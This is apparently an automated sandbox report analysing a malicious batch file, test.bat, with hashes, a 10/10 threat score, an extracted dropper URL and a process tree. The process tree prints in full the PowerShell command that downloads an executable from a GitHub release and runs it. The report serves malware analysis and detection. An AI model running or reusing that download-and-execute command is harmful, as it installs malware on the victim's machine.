Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 22:58
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win7-20240708-en
windows7-x64
4 signatures
150 seconds
General
-
Target
test.bat
-
Size
171KB
-
MD5
50143263c2d75d9d835e7ee09d4206bb
-
SHA1
5bc6c41e0f76004c48f1471d2d0dad7438cd72ab
-
SHA256
7f3067fd568421d59b16e35bdd9cbe94b3be7ce8b77e06b5ed4475fc70c683da
-
SHA512
1910b62136432ed8c26d050b4faf7d68d7b71fbc8bd190da9bb6cc9910ab0ff5a52882997832d50b7776e7cd017428fe86c1e0679b5c3100a686f5ba909d55b6
-
SSDEEP
192:CnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnF:q
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe
Signatures
-
pid Process 2656 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1900 wrote to memory of 1924 1900 cmd.exe 31 PID 1900 wrote to memory of 1924 1900 cmd.exe 31 PID 1900 wrote to memory of 1924 1900 cmd.exe 31 PID 1924 wrote to memory of 2656 1924 cmd.exe 32 PID 1924 wrote to memory of 2656 1924 cmd.exe 32 PID 1924 wrote to memory of 2656 1924 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\cmd.execmd /k powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-